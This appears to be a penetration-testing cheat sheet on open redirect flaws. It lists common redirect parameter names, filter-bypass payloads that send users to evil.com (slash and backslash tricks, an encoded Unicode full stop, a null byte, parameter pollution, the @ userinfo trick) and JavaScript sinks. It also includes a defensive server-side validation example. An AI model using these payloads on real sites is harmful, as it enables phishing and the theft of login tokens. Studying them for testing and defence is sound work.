Open redirect

/
?next
?url
?target
?rurl
?dest
?destination
?redir
?redirect_uri
?redirect_url
?redirect
/redirect/
/cgi-bin/redirect.cgi?
/out/
/out?
?view
/login?to
?image_url
?go
?return
?returnTo
?return_to
?checkout_url
?continue
?return_path
success
data
qurl
login
logout
ext
clickurl
goto
rit_url
forward_url
@https://
forward
pic
callback_url
jump
jump_url
click?u
originUrl
origin
Url
desturl
u
page
u1
action
action_url
Redirect
sp_url
service
recurl
j?url
url//
uri
allinurl:
q
link
src
tc?src
linkAddress
location
burl
request
backurl
RedirectUrl
ReturnUrl

http blacklist bypass:

//evil.com

// blacklist bypass:

https:evil.com

Using \/\/ to bypass // blacklisted keyword (browsers see \/\/ as //)

\/\/evil.com/
/\/evil.com/

Using /\ to bypass:

/\evil.com

URL-encoded Unicode full stop 。

//evil%E3%80%82com

Null byte

//evil%00.com

Parameter pollution

?next=whitelisted.com&next=evil.com

Using the "@" character: the browser treats everything before the "@" as userinfo and redirects to the host after it

http://www.theirsite.com@evil.com/
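
Server-side check that holds against each bypass form listed above, because it parses the target the way a browser does instead of matching substrings. This is an added example, not part of the original page; APP_ORIGIN, ALLOWED_HOSTS, FALLBACK and the function names are assumptions for illustration.

```javascript
// Added example (not from the original page). APP_ORIGIN, ALLOWED_HOSTS and
// FALLBACK are assumed values; "whitelisted.com" is the page's sample host.
const APP_ORIGIN = "https://app.example";
const ALLOWED_HOSTS = new Set(["app.example", "whitelisted.com"]);
const FALLBACK = "/";

// Returns a normalized URL that is safe to redirect to, or FALLBACK.
function safeRedirect(raw) {
  if (typeof raw !== "string" || raw.length === 0) return FALLBACK;
  let url;
  try {
    // Resolve as a browser would: "\" counts as "/", "//host" is
    // protocol-relative, and "user@host" puts the real host after the "@".
    url = new URL(raw, APP_ORIGIN);
  } catch {
    return FALLBACK; // unparseable, e.g. a null byte in the host
  }
  if (url.protocol !== "https:") return FALLBACK;
  if (url.username !== "" || url.password !== "") return FALLBACK;
  // url.host includes any non-default port, so odd ports are refused too.
  if (!ALLOWED_HOSTS.has(url.host)) return FALLBACK;
  // Emit the parsed form, never the raw string that was validated.
  return url.href;
}

// Reads ?next= from a query string. Repeated parameters are refused,
// since different layers may each pick a different copy.
function redirectFromQuery(query) {
  const values = new URLSearchParams(query).getAll("next");
  return values.length === 1 ? safeRedirect(values[0]) : FALLBACK;
}
```

Returning `url.href` rather than the original string matters: the value sent in the Location header is then exactly the one that passed the host check.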

View the page source. Common sinks for open redirect:

location
location.host
location.hostname
location.href
location.pathname
location.search
location.protocol
location.assign()
location.replace()
open()
element.srcdoc
XMLHttpRequest.open()
XMLHttpRequest.send()
jQuery.ajax()
$.ajax()